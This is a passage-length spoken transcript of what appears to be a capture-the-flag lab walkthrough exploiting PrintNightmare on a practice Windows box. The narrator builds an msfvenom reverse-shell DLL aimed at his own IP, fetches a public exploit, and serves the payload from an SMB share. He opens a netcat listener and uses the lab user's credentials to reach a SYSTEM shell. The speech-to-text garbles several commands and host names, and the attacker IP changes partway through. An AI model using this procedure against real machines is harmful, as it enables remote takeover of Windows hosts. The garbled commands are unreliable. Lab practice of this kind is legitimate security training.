Yo, it's the Reptilian Pride here. How are ya? Today we're going to use the PrintNightmare exploit to take advantage of the Print Spooler Vulnerability on Windows systems. To do this exploit, we need to have the payload, set up an SMB server, and then get our exploit itself. So now, let's get the payload. So I'm going to use msfvenom. Use the payload Windows x64 shell reverse TCP. So this is going to give us our reverse shell. I'm going to set my local host to 10.10.14.187, local port equal to this. I'm going to use 4444, which is for fun. You could use different ones. And the file type is going to be a DLL file with the output. I'm going to call it the payload itself .dll. Windows uses extensions. Enter. Okay, now we have our payload .dll file. Next, we need to get our exploit. So to get the exploit, I'm going to go to my Firefox and search PrintNightmare and filter out all the sites to github.com. So I'm going to get all the websites that is going to be connected with GitHub. So here I've tried a couple of them, and the one that worked for me was the one by cube0x0. And here's your exploit. So let's download this. So what happens is we're going to download the file, and the downloaded file is going to be named as exploit because I don't want it to be named as CVE-2021-1675, which is tedious to type over and over again. So now enter, and this is our file, exploit. So just for the sake of visual clarity, I'm going to make this an executable file. So now it looks pretty. Now we have our payload and our exploit file. But before we go ahead, you need to see that the author has suggested us to do this installation for impacket. To install this, just git clone. So I'll make a directory that says install, cd install, and then let's get the git clone. Okay, so now we have downloaded the files. As you can see, we have an impacket. Go to impacket, and inside this we have a setup.py file. So I'm going to take Python 3, okay, Python 3, setup.py, and install. So we have an error. As you can see, it's permission denied. So I'm gonna call sudo python 3./setup.py, install. I'll type in my password and we go. So now we have the impacket packages that work with this exploit. Clean screen, and let's go back up. Yeah. So now pretty much everything is ready. So I'm going to split my screen. Right? Now since we're waiting for a reverse shell, we need to set up a netget connection. Listen, verbose mode, use port 4444. And now it's listening for any connections that come in that port. And next is to set up our SMB server. Lucky for us, impacket also has an SMB server set up. So let's just type impacket. Packet-smb server, and then here we have to give a share name and our directory which we are trying to share. So here there's a configuration that you have to do. So for that, go to cd etc/samba. Samba is your SMB guy, your go-to ls. So I'm going to you can either make a backup file, and since I already have a backup file, I'm going to remove my smb.conf file. Yes. Sudo smb.conf. Yuck. Sudo smb.remove smb.conf. Okay. So now I'm going to do sudo nano smb.conf. Okay, now if I scroll down here, we can see this. This is your SMB configuration file data. So I'm going to copy paste that here. And this is going to be the name of the share. So whichever name you plan to put, you can put that name. So here we have SMB by default, and I would prefer keeping it SMB. And that's it. We need to also take this extra 2 pieces of code, which I will .com it up here, and we're good to go. Right. Now let's go back to our directory, ls. Now we have everything set up. So our share's name is smb, and to the current directory. Boom. So now it's created. Now let's test out if our smb is working. So smb client dash, take no passwords, 10.10.14.127. The share's name is smb, and we are in ls. We can see our payload.dll file is there. Not worry about the other files, because we made the current directory as our share, so it's not going to be a problem as long as we highlight that the .dll is the file to be sent to the Windows device. Now we are ready to execute the exploit. Now for those of you who wants to search up this and be like, oh, how did this guy know the syntax? It's written in his page over here. I just referred the same thing. And how do I know if I should use a DLL? Because I see that this guy used a DLL here, so I just use them. Okay? Yes, so dot exploit, dot slash current directory, exploit. And the attacking machine's address is driver.hdb. This is then the host file. For this one, if you are curious to know, if you go to cat slash etc slash hosts, I have set this host name over here. Okay. Now I put the colon. Tony is the name of the user. Tony is the name of the user, and the password is liltony at 10.10.11.106. This is the victim machine. Now that's going to be backslash 10.10.14.127 backslash smb backslash payload.dll. Now I click enter. Accept. As you can see, we have our reverse shell over here. Windows system. Who am I? We are in Windows. Oh no. I didn't break the system. Okay. Yeah. So you just broke into the system. Feel good about yourself. Thank you and goodbye.